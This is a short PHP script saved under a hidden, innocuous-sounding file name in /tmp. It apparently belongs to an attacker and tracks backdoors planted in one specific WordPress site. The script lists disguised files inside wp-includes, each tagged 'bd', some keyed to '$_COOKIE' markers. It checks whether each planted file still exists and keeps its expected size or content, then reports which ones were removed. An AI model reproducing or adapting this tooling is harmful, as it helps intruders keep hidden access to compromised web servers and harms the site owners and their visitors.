File: //tmp/.dbx_convert
<?php $r = '/home/xrp54be6gdhh/public_html/alexanderkhoubian.com'; $x = ["/wp-blog-header.php"=>"bd@@538914@@_COOKIE[3]",
"/wp-includes/SimplePie/comment.section.1755359245.php"=>"bd@@333557@@925",
"/wp-blog-header.php"=>"bd@@511976@@58",
"/wp-includes/sodium_compat/src/Core/french_mimes.php"=>"bd@@345670@@1608",
"/wp-includes/sodium_compat/src/PHP52/cod.php"=>"bd@@347275@@415",
"/wp-includes2./class-wp-recovery-mode-email-service.php"=>"bd@@512140@@$_COOKIE[-",
"/wp-includes/rest-api/search/class.wp.rest.search.search.handler.php"=>"bd@@347288@@453",
"/wp-includes/js/tinymce/wp.tinymce.php"=>"bd@@347289@@1014",
"/wp-includes/Requests/Response/sample03.php"=>"bd@@347291@@1532",
"/wp-includes/sitemaps/providers/class.wp.sitemaps.users.php"=>"bd@@347294@@1051",
"/wp-includes/class-wp-ajax-response.php"=>"bd@@512161@@Large-Allocation"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');